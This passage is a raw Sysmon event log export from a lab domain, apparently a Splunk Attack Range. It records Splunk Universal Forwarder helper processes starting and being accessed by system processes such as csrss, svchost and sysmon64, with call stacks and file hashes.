Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033153Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.256{FF16AF91-3783-6013-9103-00000000A401}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033178Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.755{FF16AF91-3784-6013-9303-00000000A401}21682236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033177Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3784-6013-9303-00000000A401}2168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033176Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033175Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033174Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033173Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033172Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-3784-6013-9303-00000000A401}2168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033171Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.599{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3784-6013-9303-00000000A401}2168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033170Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.600{FF16AF91-3784-6013-9303-00000000A401}2168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362690Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.490{8e433fbf-3784-6013-cd03-000000001100}46367648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362689Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3784-6013-cd03-000000001100}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362688Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362687Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362686Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362685Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362684Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3784-6013-cd03-000000001100}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362683Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.334{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3784-6013-cd03-000000001100}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362682Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:32.335{8e433fbf-3784-6013-cd03-000000001100}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033169Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:32.084{FF16AF91-3783-6013-9203-00000000A401}28562336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362699Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.162{8e433fbf-3785-6013-ce03-000000001100}55086436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362698Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3785-6013-ce03-000000001100}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362697Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362696Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362695Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362694Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362693Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3785-6013-ce03-000000001100}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362692Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.006{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3785-6013-ce03-000000001100}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 